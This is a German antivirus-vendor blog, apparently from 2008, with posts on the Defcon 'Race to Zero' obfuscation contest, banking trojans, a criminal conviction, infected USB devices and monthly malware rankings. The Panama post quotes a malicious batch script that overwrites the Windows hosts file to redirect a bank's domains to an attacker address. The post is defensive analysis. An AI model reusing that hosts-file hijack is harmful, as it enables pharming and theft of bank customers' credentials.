| |
Home / Weblog
Analytiker-Tagebuch
Mehr Gedanken zum 'Race-to-Zero-Contest' |
|
Nach Eugene möchte auch ich einige Gedanken zur diesjährigen Defcon loswerden. Letztes Jahr habe ich auf der Defcon einen Vortrag gehalten, und ich muss sagen, dass diese Veranstaltung schon etwas ganz Besonderes ist - hier treffen sich kluge Köpfe mit unkonventionellen Ideen zum Erfahrungsaustausch. Aber die Defcon bietet nicht nur den Zugang zu neuen Ideen, sondern man spürt hier auch den Geist der modernen Cyberkultur. Meiner Meinung nach war die Ausrichtung von Wettbewerben wie Race to Zero nur eine Frage der Zeit. Jetzt, da der Anfang einmal gemacht ist, können wir auch in Zukunft mit Ähnlichem rechnen - ob es uns nun gefällt oder nicht. Natürlich darf man das Gesetz nicht brechen, daher denke ich, dass die genaue Form des Wettbewerbs noch vor Beginn der Defcon geändert wird, um den gesetzlichen Vorschriften zu entsprechen. Ich bin aber der Meinung, dass die Organisatoren des Race to Zero-Contests die Spielregeln in eine ganz andere Richtung ändern könnten, so dass alle Beteiligten etwas davon hätten. Ich will das einmal kurz erklären: Was sollen die Wettbewerbsteilnehmer bei dem Contest eigentlich manipulieren? Ihnen wird der Code existierender Anwendungen sowie vermutlich einige vorbereitete Nopcode-Sets zur Verfügung gestellt. Nopcode ("no operation" code) ist eine spezielle Software, die weder den Zustand des Rechners beeinträchtigt noch das System verändert. Es gibt viele verschiedene Obfuskations-Techniken, doch fast alle beruhen auf demselben Prinzip: Der betroffene Code wird umstrukturiert und mit Nopcode vermischt. In Abhängigkeit von dem verwendeten Algorithmus zur Vermengung der beiden Codes ist es entweder besonders schwierig, den Code zu lesen/zu bearbeiten oder der Code ist vor Entdeckung durch signaturbasierte AV-Scanner geschützt. Obfuskierter Code ist durchaus geeignet, AV-Herstellern Kopfzerbrechen zu bereiten: Er ist geringfügig schwerer manuell zu analysieren, es bedarf größerer Ressourcen zur Pflege einer Datenbank von obfuskierten Samples, die sich bezüglich ihres Verhaltens nicht voneinander unterscheiden, und die Analyse eines obfuskierten Samples mit automatisierten Tools dauert länger als die von nicht obfuskierten Mustern. Daher arbeiten AV-Anbieter verstärkt an der Entwicklung von Deobfuskations-Tools. Es gibt also zwei Probleme: Obfuskation und Deobfuskation - zwei Techniken, die sich hinsichtlich ihrer Komplexität ein wenig unterscheiden. Stellen Sie sich einfach einen Eimer Zucker und einen Eimer Sand vor. Sie können den Inhalt der beiden Eimer in verschiedenen Verhältnissen mischen - das sind die verschiedenen Arten der Obfuskation. Der umgekehrte Prozess ist die Deobfuskation, d.h. das Zurücksortieren der Mischung in ihre zwei Bestandteile Zucker und Sand. Stellen Sie sich nun diese zwei Eimer vor: Es geht sehr schnell, deren Inhalt miteinander zu vermischen, aber das Auseinandersortieren ist langwierig und ermüdend! In mancherlei Hinsicht ist es nicht besonders schwierig, Obfuskationsalgorithmen anzuwenden und eine Anwendung so zu präparieren, dass sie von AV-Software nicht erkannt wird - es ist ein White-Box-Problem. Man verfügt über die Quelldaten, die AV-Software und hat zudem die Möglichkeit, den zerlegten Code zu analysieren, so dass man seine eigene Anwendung zur Veränderung der Daten entwickeln kann. Jeder Teil des selbst entwickelten Prozesses und der Mechanismen kann nachvollzogen werden. Deobfuskation dagegen ist etwas völlig anderes. Man verfügt über einige Teile des Codes, der mittels Obfuskation verändert wurde - wobei die Anwendung zur Obfuskation nicht bekannt ist. Daher kann man die Deobfuskation noch nicht einmal als Black-Box-Modell bezeichnen. Denn bei Black-Box-Tests besteht immerhin die Möglichkeit, einen Mechanismus so oft wie gewünscht einzusetzen, selbst wenn man keinen Einblick in die Funktionsweise hat. Bei der Deobfuskation stehen einem nur die Daten zur Verfügung, die aus diesem Mechanismus resultieren. Die Daten müssen dann untersucht werden, um ihre einzigartigen/allgemeinen Merkmale zu bestimmen und daraufhin kann man seine eigenen Schlüsse darüber ziehen, wie die hypothetische Black Box tatsächlich funktioniert. Meiner Ansicht nach erfordert Deobfuskation ein weitaus höheres Maß an Vorstellungskraft und zudem größere Fertigkeiten. Würden die Organisatoren von Race to Zero die Prinzipien ethischen Hackings beachten und den Wettbewerb auf Deobfuskation ausweiten, würden alle Beteiligten ihren Spaß an der ganzen Veranstaltung haben und wertvolle Erfahrungen mitnehmen können. Um es noch einmal klar zu stellen: Um die Problematik der Obfuskation/Deobfuskation zu untersuchen, bedarf es keiner neuen Malware und auch bereits bestehende Schadprogramme müssen zu diesem Zweck nicht modifiziert werden. Das ist schlicht und ergreifend nicht nötig. Dieser Wettbewerb ist nicht nur ein technische, sondern gleichermaßen eine moralische Herausforderung. Es bleibt zu hoffen, dass sich jeder für die richtige Seite entscheidet, so dass wir alle unseren Nutzen daraus ziehen können.
Malware obfuscation contest |
|
Über den so genannten Malware-Obfuskations-Wettbwerb, den „Race to Zero Contest“, gehen die Meinungen schon im Vorfeld weit auseinander. Meiner bescheidenen Meinung nach ist eine Sache entweder ethisch vertretbar oder sie ist es eben nicht – und ich halte die Entwicklung neuer Malware zur Umgehung von Sicherheitsprodukten „nur so zum Spaß“ ganz und gar nicht für richtig! Wir Antivirenforscher haben die Entwicklung neuer Malware immer unter allen Umständen bekämpft. Die einzige Erklärung für die Entwicklung von Schadprogrammen in Testumgebungen – „Wir müssen neue Samples entwickeln, um die Angriffsmethoden im Detail untersuchen zu können“ - klang schon immer wenig plausibel. Seien wir doch mal realistisch: Täglich stoßen wir auf tausende von neuen Samples - wir haben also mehr als genug ‘echte’ Malware, die wir untersuchen können, um unsere Technologien zu verbessern. Wenn diese Erklärung also irgendwann einmal „vielleicht-unter-Umständen-im-Ausnahmefall-aktzeptabel“ war, so ist sie es im Jahr 2008 eindeutig NICHT mehr. Die Behauptung, der signaturbasierte Antivirus sei tot – heute müsse man sich auf heuristische, statistische und verhaltensbasierte Techniken konzentrieren, um neue Bedrohungen zu identifizieren, ist nichts weiter als ein billiger Gag. Niemand – vor allem niemand in der AV-Industrie – verlässt sich allein auf die signaturbasierte Erkennung. Und zwar schon seit Jahren nicht mehr. Es sieht aber in der Tat so aus, als würden die meisten (sprich alle) AV-Scanner die ‘Tests’ in diesem ‘Wettbewerb’ nicht bestehen, da es nicht schwer ist, signaturbasierte Scanner und statistische Heuristikmethoden auszutricksen. Das ist eine klare Botschaft an tausende von Cyberkriminellen, nämlich: „Konzentriert Euch mehr auf Obfuskation“. Dieser so genannte Wettbewerb wird also Cyberkriminelle dazu animieren, neue Obfuskations-Technologien zu erforschen und zu entwickeln. Da sie das sowieso bereits tun, werden sie in dieser Richtung nur noch weiter bestärkt. Nein danke, Virenlabs sind auf eine solche Animation nicht angewiesen – wir haben auch so genug zu tun. In den meisten öffentlichen Äußerungen wird dieser Wettbewerb als eine Art Produkttest bezeichnet. Falsch!! Antiviren-Tests müssen, wie alle anderen Produkttests auch, von speziell ausgebildeten Profis, wie etwa Andreas Clementi, Andreas Marx oder Virus Bulletin, unter fairen, moralisch vertretbaren Bedingungen wissenschaftlich korrekt durchgeführt werden. So laufen die Dinge in einer seriösen Branche. Der Race to Zero/DefCon 'Contest' wird NICHT von professionellen Testern durchgeführt – kein Kommentar.
ist NICHT fair – es gibt bisher keine öffentlichen Kontakte zu AV-Anbietern.
ist NICHT wissenschaftlich – der Testaufbau ist nicht klar beschrieben.
Ist - last, but not least - 100%ig NICHT ethisch vertretbar! Die Entwicklung von Malware ist ein
Verbrechen. Ende der Durchsage. Und schließlich – wie steht’s mit dem US Federal Computer Act?? Und anderen Gesetzen? Ist dieser ‚Wettbewerb’ in den USA überhaupt legal? Ist sich die zuständige Behörde zur Aufdeckung von E-Verbrechen dessen überhaupt bewusst? Es läuft also alles auf die Frage hinaus, ob wir öffentliche und unstrukturierte ‘Wettbewerbe’ brauchen, um kriminelle Technologien zu testen, die von nicht befugten Personen durchgeführt werden. Wie wär’s mit einem ‚Banküberfall-Wettbewerb’, um die Sicherheitssysteme von Banken zu testen? Oder vielleicht einem ‚Drogenhandels-Contest in Schulen’, um die Drogenfahndung auf den Prüfstand zu stellen? Man kann alles so weit auf die Spitze treiben, bis es lächerlich wird – Codeanalyse eingeschlossen. Wir sollten alle einmal tief durchatmen und uns dann wieder auf die Entwicklung von Schutz-Technologien konzentrieren, und nicht auf das Modifizieren von Malware just for fun.
|
Vor kurzem waren wir in Panama, wo wir an einer Konferenz zur Cyberkriminalität in Südamerika teilgenommen haben. Obwohl Costa Rica die höchste Internetpenetration zu verzeichnen hat, führt Panama die Länder mit den meisten erfolgreich durchgeführten Angriffen an. Aber warum ist Panama in dieser Hinsicht so reizvoll? Seine blühende Wirtschaft und eine Freihandelszone haben zur Gründung vieler Banken in diesem Land geführt. Und bei den erfolgreichen Attacken handelt es sich um Angriffe auf Banken. 
In unserem Konferenzbeitrag wiesen wir darauf hin, dass Cyberattacken heute geografisch meist stark begrenzt sind – sie sind auf ein bestimmtes Land zugeschnitten, richten sich gegen eine bestimmte Gruppe in diesem Land und breiten sich in der Regel nicht über die Grenzen der entsprechenden Region oder auch nur des entsprechenden Staates hinaus aus. Diese Taktik zielt darauf ab, den Lebenszyklus des für die Attacke verwendeten Schadprogramms zu verlängern, denn lokale Attacken verringern das Entdeckungsrisiko durch Antiviren-Unternehmen. Kurz nachdem wir aus Panama zurückgekehrt waren, brach eine dieser Attacken los. E-Mail-Anwender der Domain .pa erhielten Spam-Mails mit der Aufforderung, eine E-Card des lateinamerikanischen Services Gusanito.com zu öffnen. Klickt der User auf den Link, so lädt sich die Datei 001002003.exe auf den Opfercomputer und führt die folgenden Operationen durch: @echo off
title AVERSINODETECTA----------HAHAHAHAHAHAHAHAHAHAHA
del c:\WINDOWS\system32\drivers\etc\hosts
copy hosts c:\WINDOWS\system32\drivers\etc\hosts
echo 75.127.*.* www.bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
exit
echo > "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpfile0.tmp" Das Schadprogramm fügt der lokalen DNS-Datei einen IP-Eintrag für die BBV Panama Domain hinzu. Der Eintrag in das Titelfeld, der eine Phrase mit der Bedeutung „Vielleicht merken sie es nicht“ enthält, weist darauf hin, dass der Autor mit hoher Wahrscheinlichkeit spanisch spricht. Ist das Angriffsopfer Kunde der Bank und versucht nun, die Website der Bank aufzurufen, wird er automatisch zu einer gefälschten Site umgeleitet, die – wie in solchen Fällen üblich – kaum von der Originalseite zu unterscheiden ist. 
Wie oben bereits erwähnt, verbreiten Virenautoren ihre Machwerke nur innerhalb eines begrenzten Gebietes, um die Entdeckung durch Antiviren-Produkte so lange wie möglich hinauszuzögern. Dieser Fall zeigt, dass diese Taktik bis zu einem gewissen Grad erfolgreich ist – drei Tage nach dem Angriff, wurde das entsprechende Schadprogramm nur von 2 Antiviren-Lösungen erkannt. Eine davon war Kaspersky Anti-Virus, das den Schuldigen hinter dieser jüngsten Attacke als Trojan.Win32.Qhost.alc erkennt.
Fall QUIK: Schnelle Verurteilung |
Es gibt Neues im Fall des QUIK-Trojaners, über den wir vergangene Woche bereits berichteten: Ein 24jähriger Mann wurde wegen Computerkriminalität zu fünfeinhalb Jahren Haft verurteilt. Laut Paragraph 1, Absatz 272 (illegaler Zugriff auf gesetzlich geschützte Computerdaten) und Paragraph 4, Absatz 159 (Betrug) des russischen Strafgesetzbuches wurde er für schuldig befunden und wird seine Strafe in einer staatlichen Strafvollzugsanstalt unter minimalen Sicherheitsbestimmungen absitzen. Im Prozess hieß es, dass “ sich der Angeklagte zwischen Juni und August 2007 mit Hilfe eines Schadprogramms das Geheimpasswort einer kommerziellen Organisation verschafft und im Namen der Organisation mit Termingeschäften gehandelt hat.“ Die Verluste beliefen sich insgesamt auf über 1,3 Millionen Rubel. Der junge Mann, der seine Schuld vor Gericht einräumte, hatte 1 000 000 seiner unrechtmäßig erworbenen Rubel auf ein persönliches Konto bei einer lokalen Bank überwiesen.
|
Regelmäßige Leser dieses Blogs oder anderer Analysen erinnern sich vielleicht daran, dass wir im Sommer vergangenen Jahres über eine neue Version des Schädlings Bancos.aam berichteten, der auf den Diebstahl von Anwenderdaten eine russischen Plattform für den Online-Börsenhandel namens QUIK spezialisiert ist. Laut Berichten russischer Medien über die laufenden Ermittlungen wurde einem gewissen Evgeny Simonov aus Yoshka-Ola nun untersagt, die Stadt zu verlassen. Er benutzte den Trojaner, um Login und Passwort eines Brokers zu stehlen und verdiente dann mit krummen Geschäften unter dem Strich mindestens 2,5 Millionen Rubel (ungefähr hunderttausend Dollar). 
Simonov hatte eindeutig seine Chance gesehen, das schnelle Geld zu machen – qui(c)k money eben. Zum Verhängnis wurde ihm allerdings, dass er seine Geschäfte unter anderem über Handy abwickelte: Die Ermittler überprüften beim Abschluss der betrügerischen Geschäfte die IP-Adresse und kamen Simonov über seinen Mobilfunkanbieter auf die Spur. Dieser Fall wirft einen interessanten Aspekt auf: Neue Technologien und hohe Konnektivität eröffnen Malware-Autoren zwar immer mehr Möglichkeiten, doch dieselben Technologien können auch gegen sie verwendet werden.
|
Ja, ja die Zahlen – es gibt einfache Zahlen, magische Zahlen, Glückszahlen und Unglückszahlen. Manche Leute fürchten sich vor Zahlen, andere haben kein Zahlenverständnis und wieder andere ignorieren sie einfach. Ich für meinen Teil liebe Zahlen und achte immer darauf, wie sie klingen und wie sie sich anfühlen. Am Sonntag bin ich mit ein paar Leuten von New York City nach Boston geflogen. Nachdem der Computer meine Bordkarte ausgespuckt hatte, warf ich einen Blick auf die Zahlen und stellte fest, dass dieser Tag von der 13 regiert wird! Datum – der 13. Flugnummer – 13, eingerahmt von der 2 und 0, die sich in der Gate-Nummer 20 wiederholen Boarding-Zeit – 13 Uhr UND 3 + A in Hexadezimalzahlen ausgedrückt ist 3 + 10 =13 Vier mal die 13 auf einer einzigen Bordkarte! Wow, ich bin überrascht, dass ich den Flug überlebt habe! Wie kann das angehen, mag man sich fragen – sofern man daran glaubt, dass die 13 Unglück bringt. Vielleicht liegt es daran, dass die Abflugzeit 20 Uhr (200P) war und dass ich im April 2008 geflogen bin – was wiederum 14 ergibt, wenn man die Zahlen 04-2008 addiert. Und schließlich war es mein 14. Flug in diesem Jahr, nicht mein 13. Ich habe also überlebt und beschließe nun diese Tour durch die USA in Boston. Mal schauen, welche Zahlen mir meine Flug Nr. bringen wird. In letzter Zeit gewinnt man den Eindruck, dass es von infizierten Geräten aller Art nur so wimmelt. Diese Woche hat bereits HP eingeräumt, infizierte Floppy/Flash-Laufwerke ausgeliefert zu haben. Weitere Informationen hierzu gibt es beim SANS Internet Storm Center: http://www.isc.sans.org/diary.html?storyid=4247. Zwischenzeitlich ging eine meiner Kolleginnen in den Urlaub und gönnte sich einen neuen MP3 Player. 
Wieder zu Hause angekommen, steckte sie ihr neues Spielzeug in einen USB Port ihres PCs und stellte fest, dass es – ja, richtig geraten! – infiziert ist. Glücklicherweise hatte sie KIS auf ihrem Rechner installiert: 
Einerseits sind wir alle froh über unsere Smartphones, MP3 Player, Flash-Drives usw. Andererseits kann man sich nie sicher sein, dass diese Geräte auch sauber sind. Daher schützt die Server und Laptops, Leute, denn mobile Geräte werden weder in nächster Zukunft von der Bildfläche verschwinden…noch sind sie sicher.
Viren-Almanach (Nr. 3, März 2008) |
|
- Gierigster Schädling im Bank-Bereich
Im ersten Frühlingsmonat erwies sich eine der Modifikationen von Trojan-Spy.Win32.Banker.zq als gierigster Schädling in dieser Kategorie. Er äußerte Interesse an den Kunden von 109 Banken gleichzeitig. - Gierigster Schädling für elektronische Geldsysteme
Sieger in dieser Kategorie wurde Trojan-Spy.Win32.Banker.etk, in dessen Einflusszone gleich drei elektronische Geldsysteme gerieten. - Gierigster Schädling für Key Cards
Gemäß den Ergebnissen vom März gebührt hier der Sieg Trojan-Spy.Win32.Banker.enw, der die Kunden von vier unterschiedlichen Zahlungssystemen angriff. - Verstecktester Schädling
Eine zehnfache Verpackung ist schon keine Seltenheit mehr. Nicht zum ersten Mal wird zum Sieger ein „Übeltäter“ gekürt, der durch unterschiedliche Komprimierungsprogramme zehnfach verpackt wurde. Dieses Mal ist es Trojan-Downloader.Win32.Delf.ain. - Kleinster Schädling
Als kleinster Schädling erwies sich im ersten Frühlingsmonat Trojan.BAT.FormatC.r, der spielend den Inhalt der Festplatte C: des Computers löscht. Dabei besitzt er eine Größe von lediglich 16 Byte. - Größter Schädling
Bereits den zweiten Monat in Folge erhielt diesen Platz die Familie Haradong, genauer gesagt, die Modifikation Trojan.Win32.Haradong.fj mit einer Größe von 305 MB. Das bedeutet, dass innerhalb eines Monats der Vertreter dieser Familie um 79 MB „wuchs“. - Feindseligster Schädling
Mit dem Jahreszeitenwechsel vollzog sich auch ein Führungswechsel in dieser Kategorie. Sieger wurde eine der Modifikationen von Backdoor.Win32.Rbot.gen, was angesichts der „Feindseligkeit“ der Familie Rbot zu erwarten war.
Das entdeckte Beispiel blockiert die Arbeit des Antivirenschutzes mit unterschiedlichen Mitteln. - Im E-Mail-Traffic verbreitetster Schädling
Im vergangenen Monat konnten in dieser Kategorie keine spürbaren Änderungen festgestellt werden – zum ständigen Vertreter wurde Email-Worm.Win32.Netsky.q mit seinem Anteil von 37-39 Prozent am gesamten schädlichen E-Mail-Traffic. - Am weitesten verbreitete Familie unter den Trojanern
Als zahlreichste Familie erwies sich im März Backdoor.Win32.Hupigon, von der neue Vertreter in sage und schreibe 3381 (!) Modifikationen innerhalb eines Monats festgestellt wurden. - Am weitesten verbreitete Familie unter Viren und Würmern
Nach den Ergebnissen des ersten Frühlingsmonats wurde Net-Worm.Win32.Kolab, von dem Exemplare in 35 Modifikationen entdeckt wurden, zur zahlreichsten Familie unter den Viren und Würmern.
Lassen Sie sich nicht in den April schicken! |
|
Schon lange ergreifen Virenautoren jede sich bietende Gelegenheit, um ihre Machwerke unter die Leute zu bringen, wobei besonders nationale Feiertage und andere populäre Daten gern genutzt werden. Der diesjährige Valentinstag ist dafür ein aktuelles Beispiel. Besonders effektiv ist dieser Ansatz zur Verbreitung von Schadcode, wenn es sich um internationale Feiertage oder ähnliches handelt, denn dann steigt die Anzahl der potentiellen Opfer entsprechend. Letzte Nacht, am Vorabend des ersten April, sahen wir eine Welle neuer Modifikationen des berüchtigten Wurms Zhelatin auf uns zurollen. Während unsere Mail-Fallen begannen, die entsprechenden Nachrichten auszusortieren, erkannte kein Anti-Virus-Unternehmen die neuesten Versionen des Wurms. Auch dieser jüngste Angriff lief nach dem altbekannten Schema ab: 1: Vorbereitung der Bot-Computer
2: Massenversendung von Mails mit einem Link auf die Site
3: Automatischer Download des Schadcodes auf den Opfercomputer, wenn die Site geöffnet wird Hier ein Beispiel: Sollte der Schadcode aus irgendeinem Grund nicht automatisch beim Öffnen der Site herunter geladen werden, so wird er manuell geladen, wenn der User entweder auf das Bild oder den Hyperlink klickt. Die schädliche Datei hat unterschiedliche Name, einige der neuesten Exemplare heißen funny.exe, foolsday.exe und kickme.exe. Auch die Größe der Schaddatei variiert je nach Version des Schadprogramms, liegt aber normalerweise bei etwa 137 KB. Kaspersky Lab erkennt den Schädling als Email-Worm.Win32.Zhelatin. Die Ganoven haben nicht nur die vollständige Kontrolle über die Bot-Computer, sondern sie haben natürlich auch ein Auge darauf, was im AV-Lager vor sich geht. Sobald die letzte Variante des Schadprogramms erkannt wurde, wird sie auf der Site durch eine neue ersetzt. Und während die Virenschreiber uns beobachten, lassen wir sie natürlich auch nicht aus den Augen und verfolgen die Aktivität auf diesen Seiten. Zum Schluss unsere übliche Warnung: Sorgen Sie dafür, dass Ihre Antivirus-Datenbanken immer auf dem neuesten Stand sind und lassen Sie auch am ersten April die Sicherheit nicht außer Acht.
Viren-Almanach (Nr. 2, Januar 2008) |
|
Gierigster Schädling im Bank-Bereich
Gemäß den Ergebnissen des letzten Wintermonats gebührt der Sieg in dieser Kategorie der Modifikation Trojan-Spy.Win32.Banker.cji, dessen Aufmerksamkeit gleich 44 Banken galt. Gierigster Schädling für elektronische Geldsysteme
Sieger wurde hier im Februar Trojan-Spy.Win32.Banker.iei, der von seinem Autor für den Angriff auf Kunden von 4 elektronischen Geldsystemen zugleich vorgesehen wurde. Gierigster Schädling für Key Cards
Hier etablierte sich Trojan-Spy.Win32.Banker.ibp zu Recht auf diesem Platz, denn er greift Kunden von gleich fünf Geldkartensystemen an, was nicht allzu oft vorkommt. Gewöhnlich werden von Vertretern dieser Kategorie nicht mehr als 3-4 Ziele gleichzeitig angegriffen. Verstecktester Schädling
Die durch unterschiedliche Komprimierungsprogramme erreichte zehnfache Verpackung von Trojan-Dropper.Win32.Small.to machte ihn im Februar zum verdienten Sieger in dieser Kategorie. Kleinster Schädling
Trojan.BAT.KillWin.cs mit einer Größe von 27 Byte war der Knirps im Monat Februar, was letztlich eine Wiederholung des Rekords des Vormonats darstellt. Mit einer solchen Größe schafft es der „Schädling“ dennoch, das Betriebssystem Windows auf der Festplatte zu vernichten. Größter Schädling
Im letzten Wintermonat wurde Trojan.Win32.Haradong.ct mit einer Größe von 226 MB zum Sieger gekürt. Es ist zu erwähnen, dass diese Familie nicht selten in dieser Kategorie auftaucht. Feindseligster Schädling
Eine der Modifikationen von Backdoor.Win32.Agobot.gen vernichtet die Schutzprogramme der Heimanwender in großem Maßstab. Es werden Dateien auf der Festplatte und Prozesse im Arbeitsspeicher des Computers zerstört. Im E-Mail-Traffic verbreitetster Schädling
Zum wiederholten Male gebührt hier der Sieg Email-Worm.Win32.Netsky.q, der fast 36% des gesamten schädlichen E-Mail-Traffics bestimmte. Am weitesten verbreitete Familie unter den Trojanern
Zur zahlreichsten Trojanerfamilie wurde die Familie von Trojan-PSW.Win32.Onlinegames, von der neue Vertreter in sage und schreibe 1092 Modifikationen festgestellt wurden. Am weitesten verbreitete Familie unter Viren und Würmern
Der scheidende Winter brachte einen Führungswechsel in dieser Kategorie mit sich. Im Februar wurde Email-Worm.Win32.Warezov zum Sieger, der sich durch das Erscheinen neuer Vertreter in 30 Modifikationen auszeichnete.
| |
